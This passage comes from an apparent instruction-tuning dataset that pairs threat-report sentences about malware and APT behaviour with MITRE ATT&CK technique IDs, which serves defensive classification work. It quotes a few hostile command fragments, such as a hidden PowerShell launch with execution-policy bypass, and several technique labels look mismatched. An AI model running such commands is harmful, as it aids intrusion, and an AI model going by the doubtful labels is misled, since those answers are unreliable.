implant was given a ""junk length"" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands: Commands received from the control server are encoded DWORDs After decoding, these DWORDs should be in the range 123459h to 123490h Malware checking to make sure a received command is in the correct range### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has injected into running processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has used compressed and decimal encoded VBS scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The AutoIT script is offering a lot of other functions which are not used in this campaign, like anti-virtual machine detection, USB drive infection and others.The final payload — which we found in the AutoIT PE file resource section and was started by the process-hollowing shellcode — is a .NET PE file that's obfuscated with ConfuserEx### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used malware that will issue the command shutdown /r /t 1 to reboot a system after wiping its MBR.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has used svchost.exe to execute a malicious DLL .### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky created folders in temp directories to host collected files before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, depending on the virtual networking implementation , network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can extract drive information from the endpoint and search files on the system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: Sofacy Fysbis capability related leakage through strings Figure 2 shows interactive status / feedback strings that can give a defender an initial profile of capabilities### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has a module to download and execute files on the compromised machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya will reboot the system one hour after infection.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 has disabled host-based firewalls.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Legitimate applications and other administrative programs may utilize Remote Services to access remote hosts.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used net use to conduct internal discovery of systems.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin has mimicked the Cron binary to hide itself on compromised systems.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has installed a new Windows service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may alter application binaries used to display data in order to cause runtime manipulations.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can download additional files for execution on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has been executed through a malicious JScript downloader.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK has the ability to use the CreatePipe API to add a sub-process for execution via cmd.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole InvisiMole can identify proxy servers used by the victim and use them for C2 communication.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux can run whoami to identify the system owner.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to enumerate windows on a compromised host.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERTON can install a Registry Run key for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One persistence mechanism used by CozyCar is to register itself as a Windows service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK has the ability to download files from C2 to the infected host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has deleted volume shadow copies using vssadmin.exe.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account .### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover copies files from removable drives to C:\system.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can use WMI commands to check the system for firewall and antivirus software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses HTTP to communicate with a command and control server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify file or directory permissions/attributes to evade access control lists and access protected files.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework., lists the running processes### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HELLOKITTY can search for specific processes to terminate.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows ""logon failure"" event ID 4625.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may take advantage of routing schemes in Content Delivery Networks and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used email for C2 via an Office macro.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Link-Local Multicast Name Resolution and NetBIOS Name Service are Microsoft Windows components that serve as alternate methods of host identification.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used Cobalt Strike to empty log files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can identify the hard disk volume serial number on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unique User-Agents The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has decoded strings from the C2 server before executing commands.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has deployed different types of containers into victim environments to facilitate execution.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis has used DNS tunneling for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has the ability to use the WinExec API to execute malware on a compromised host.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Payloads may be compressed, archived, or encrypted in order to avoid detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An increasingly popular tactic by threat actors is to use legitimate hosting services like Google Cloud or CloudFlare for their payload and C2  infrastructure, making it much more difficult to safely block IPs### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) To facilitate lateral movement, the adversaries deploy ASPXTool web shells to internally accessible systems running IIS### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy contains a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows service control manager is an interface to manage and manipulate services.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DNS packets contain many fields and headers in which data can be concealed.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,keylogger) may be missing for these platforms### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools can be used for malicious purposes by an adversary, but were not intended to be used for those purposes .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has used spearphishing emails containing attachments with embedded malicious macros.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Here is an example of the result of ps ax on an infected system: $ ps ax[...] 566 ?? Ss 0:00.01 /usr/libexec/icloudsyncd -launchd netlogon.bundle[...] Figure 8: Result of ps ax on an infected system Keychain stealing The OSX/Keydnap backdoor is equipped with a mechanism to gather and exfiltrate passwords and keys stored in OS X’s keychain### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT17 has created and cultivated profile pages in Microsoft TechNet.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Windows adds the configuration to the Registry in XML format.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK has the ability to inject shellcode into svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This request is followed by a call to “GetisrunasAbById” to determine if the Trojan should use “runas” to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used RDP to access targeted systems.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can download and upload files to the victim's computer.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can modify service configurations.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can gather information about the host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil has used tools that are capable of obtaining credentials from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note that every string is decrypted with different XOR parameter which may fail some of the automatic analyzers.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Odbcconf.exe is digitally signed by Microsoft.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has the curl command and batch scripts to download new tools.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT has a feature to perform screen capture.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variation of APC injection, dubbed ""Early Bird injection"", involves creating a suspended process in which malicious code can be written and executed before the process' entry point via an APC.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats used various implants, including those built with VBScript, on target machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This differs from Steal Web Session Cookie, Steal Application Access Token, and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used MSI files to download additional files to execute.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's network topology that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can collect the computer name from the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec contains a keylogger component.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has been executed via MSHTA application.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has obfuscated the wallet address in the payload binary.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has obfuscated data with base64, AES, RC4, and bz2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot uses SSL for encrypting C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload of CozyCar is encrypted with simple XOR with a rotating key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon used privately developed and customized remote access tools.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may log user keystrokes to intercept credentials as the user types them.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use WMI to deliver a payload to a remote host.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has modified and used customized versions of publicly-available tools like PLINK and Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used cmd.exe execute arbitrary commands on the infected host across different stages of the infection change.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,@6”{Unique Identifier}.” Calisto has the capability to add its own account to the victim's machine.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS uses standard encryption library functions to encrypt files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands such as net localgroup of the Net utility, dscl .### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used Ruby scripts to execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete stores files and logs in a folder on the local drive.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,.service files are Systemd Service unit files that are managed by the systemd system and service manager.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam creates a backdoor through which remote attackers can retrieve files.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can support RDP control.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MIB may also contain device operational information, including running configuration, routing table, and interface details.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can use Windows API functions to inject the ransomware DLL.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Poseidon Group obtains and saves information about victim network interfaces and addresses.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It will run the newly downloaded PowerShell script by running the following command via cmd /c: wscript.exe ""Office365DCOMCheck.vbs"" ""PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -NoProfile "" The payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT obtains a build identifier as well as victim hard drive information from Windows registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can use Cron to create periodic and pre-scheduled background jobs.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Bazar loader has named malicious shortcuts ""adobe"" and mimicked communications software.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform sudo caching and/or use the suoders file to elevate privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar's loader can delete scheduled tasks created by a previous instance of the malware.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Regin malware platform supports many standard protocols, including HTTP and HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to get directory listings or drive information on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of enumerating Registry keys and values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LC_LOAD_DYLIB ### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,stages collected data in a text file.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore can modify the victim's firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SPACESHIP identifies files with certain extensions and copies them to a directory in the user's profile.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron has a function to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most decompression techniques decompress the executable code in memory.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can search for files in directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT uses the Forfiles utility to execute commands on the system.### Assistant: T1202: Indirect Command Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 also obfuscates malicious macros delivered as payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has used FTP for C2 connections.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has embedded malicious macros in document templates, which executed VBScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to schedule remote AT jobs.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,High resolution screenshots of specified process windows and when recording VoiceIP application audio### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group malware has used CreateProcess to launch additional malicious components.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT has a command to enumerate running processes and identify their owners.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can install additional modules via C2 commands.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using the machine's local time, XCSSET waits 43200 seconds from the initial creation timestamp of a specific file, .report.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can execute commands and scripts through rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz has the ability to steal credentials from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by executing malicious content triggered by an interrupt signal.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has the ability to identify the current Windows domain of the infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also used GitHub as a repository for tools that it downloaded post-compromise.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can use DLL side-loading to load malicious DLLs.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The deprecated at utility could also be abused by adversaries , though at.exe can not access tasks created with schtasks or the Control Panel.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, this may be used to forge SAML Tokens, without the need to compromise the signing certificate to forge new credentials.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam creates a backdoor through which remote attackers can retrieve lists of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The OsInfo function in Komplex collects a running process list.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis can collect information about running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has used HTTP if DNS C2 communications were not functioning.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uses various API to perform behaviors such as executing 